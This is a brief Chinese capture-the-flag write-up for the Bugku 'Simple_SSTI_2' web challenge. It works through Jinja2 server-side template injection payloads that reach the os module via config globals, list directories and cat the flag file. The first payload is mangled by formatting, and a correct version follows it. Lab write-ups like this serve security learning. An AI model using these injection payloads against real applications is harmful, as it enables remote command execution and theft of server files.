Bugku-web-Simple_SSTI_2
通过{{ config.class.init.globals[‘os’].popen(‘ls …/’).read() }}读取系统文件(读取网站系统目录),发现如下的文件夹:
{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
于是猜测flag是否藏在某一个文件夹中,于是尝试用ls列举出文件夹中的文件一下。
{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}
用cat打开这个文件浏览
{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}